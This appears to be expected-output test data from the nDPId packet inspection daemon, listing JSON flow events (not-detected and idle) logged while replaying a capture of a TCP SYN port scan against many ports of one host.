+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54328,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059565,"flow_last_seen":1278275059565,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":54328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1081,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":842,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059786,"flow_last_seen":1278275059786,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1082,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":905,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1082,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1083,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059626,"flow_last_seen":1278275059626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1083,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":791,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1083,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1084,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1085,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":768,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1084,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1085,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":829,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1085,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1086,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":689,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059566,"flow_last_seen":1278275059566,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1086,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":758,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1086,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":383,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058846,"flow_last_seen":1278275058846,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1088,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059281,"flow_last_seen":1278275059281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1087,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058970,"flow_last_seen":1278275058970,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1087,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1089,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1679,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060951,"flow_last_seen":1278275060951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1088,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059405,"flow_last_seen":1278275059405,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1088,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1089,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061055,"flow_last_seen":1278275061055,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1089,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1629,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1090,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061004,"flow_last_seen":1278275061004,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1090,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21571,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":21571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1091,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060226,"flow_last_seen":1278275060226,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27715,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059956,"flow_last_seen":1278275059956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":27715,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1602,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":21571,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 